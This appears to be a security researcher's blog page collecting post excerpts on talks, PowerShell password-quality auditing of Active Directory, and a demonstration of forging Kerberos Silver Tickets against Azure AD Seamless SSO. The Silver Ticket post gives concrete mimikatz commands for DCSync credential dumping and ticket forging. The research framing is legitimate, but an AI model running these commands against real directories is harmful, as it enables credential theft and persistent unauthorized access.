I will be delivering 2 tech talks at this year’s SecTor conference in Canada:
Unfortunately, it is still unclear whether the conference will need to be moved online.
I will be delivering 2 tech talks at this year’s SecTor conference in Canada:
Unfortunately, it is still unclear whether the conference will need to be moved online.
I will be hosting a webinar titled “PowerShell in the Land of DevOps” on Monday, June 29, 2020, 10:00 AM – 11:30 AM CEST. We will explore features of PowerShell that can be used to automate the deployment of server applications, validate the infrastructure configuration against a well-defined baseline, and orchestrate software tests with GitHub or Azure DevOps.
If you are interested, you can register for this event through GoToWebinar.
Tags: DevOps, GitHub, Microsoft Azure, PowerShell
The Test-PasswordQuality cmdlet now supports cross-domain and cross-forest duplicate password discovery and offline password hash comparison against HaveIBeenPwned:
1 2 3 4 |
$contosoAccounts = Get-ADReplAccount -All -Server $env:LOGONSEVER $adatumCred = Get-Credential -Message 'Admin credentials for the adatum.com domain:' $adatumAccounts = Get-ADReplAccount -All -Server 'nyc-dc1.adatum.com' -Credential $adatumCred $contosoAccounts + $adatumAccounts | Test-PasswordQuality -WeakPasswordHashesSortedFile 'pwned-passwords-ntlm-ordered-by-hash-v5.txt' |
The output of the previous script might look like this (with some parts omitted):
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
Active Directory Password Quality Report ---------------------------------------- ... Passwords of these accounts have been found in the dictionary: ADATUM\larry_admin CONTOSO\harry ... These groups of accounts have the same passwords: Group 1: ADATUM\smith ADATUM\srv_sql01 Group 2: ADATUM\Administrator ADATUM\joe_admin CONTOSO\Administrator CONTOSO\joe_admin ... |
The example above uses the MS-DRSR protocol. Similar results can be achieved by using the Get-ADDBAccount cmdlet to read account information directly from a ntds.dit file.
One of the lesser known features of Active Directory (AD) is called Credential Roaming. When enabled, it synchronizes DPAPI Master Keys, user certificates (including the corresponding private keys) and even saved passwords between computers. These credentials can easily be extracted from Active Directory database. If you want to learn more on this topic, be sure to read my #CQLabs article.
Here is the recording of my Black Hat Europe 2019 Briefings session about Exploiting Windows Hello for Business:
Tags: Active Directory, PowerShell, Security, Video
My HipConf 2018 slide deck about Offline Attacks on Active Directory is available for download.
The Restore From Media stuff will be published in the upcoming DSInternals 3.1 release.
Last month, Microsoft has introduced a new feature of Azure AD Connect called Single Sign On. It allows companies to configure SSO between AD and AAD without the need to deploy ADFS, which makes it an ideal solution for SMEs. Here is a high-level diagram of this functionality:
As we can see from the diagram above, Azure AD exposes a publicly available endpoint that accepts Kerberos tickets and translates them into SAML and JWT tokens, which are understood and trusted by other cloud services like Office 365, Azure or Salesforce. And wherever you have Kerberos-based authentication, it can be attacked using Silver Tickets.
In usual circumstances this attack can only be performed from the intranet. But what really caught my attention is the fact that with this new SSO feature, Silver Tickets could be used from the entire internet. Let’s give it a try then!
To test this technique, we need to retrieve some information from Active Directory first:
1 |
mimikatz.exe "lsadump::dcsync /user:AZUREADSSOACC$" exit |
1 2 |
Get-ADReplAccount -SamAccountName 'AZUREADSSOACC$' -Domain contoso ` -Server lon-dc1.contoso.local |
Having this information we can now create and use the Silver Ticket on any Windows computer connected to the internet. It does not even matter whether it is joined to a domain or a workgroup:
1 2 3 4 |
mimikatz.exe "kerberos::golden /user:elrond /sid:S-1-5-21-2121516926-2695913149-3163778339 /id:1234 /domain:contoso.local /rc4:f9969e088b2c13d93833d0ce436c76dd /target:aadg.windows.net.nsatc.net /service:HTTP /ptt" exit |
1 |
klist purge |
It is also worth noting that the password of the AZUREADSSOACC account never changes, so the stolen hash/key will work forever. It could therefore be misused by highly privileged employees to retain access to the IT environment after leaving the company. Dealing with such situations is a much broader problem, which is aptly depicted by the following old Narnian saying:
First of all, I have to point out that this technique would not be very practical in real-world situations due to these reasons:
As you can see, there is simply no need to panic. But just to be safe, I would recommend these generic security measures:
Although the Silver Ticket attack has been here for some years, it is now probably the first time it can be used over the internet against a cloud service, which theoretically makes it even more potent. On the other hand, it would be quite hard to perform this technique in a real-world environment due to impracticalities discussed in the previous section, so there is no need to worry. The new Seamless SSO feature of Azure AD Connect can therefore be considered safe and preferred solution for SSO to Office 365 .
Tags: Active Directory, Microsoft Azure, Mimikatz, Office 365, Security
I recently worked with Thycotic to create a program called Weak Password Finder for Active Directory. The goal was to develop a tool that would be very easy to use yet powerful enough to yield actionable results. I think that this combination really makes it unique in the market. It basically does the same as my PowerShell module, but with a nice and shiny user interface:
It generates reports which are suitable for the management:
Of course, you can also drill down through the detailed data:
Here is a quick demo of the tool:
Did I mention that the Weak Password Finder is totally FREE?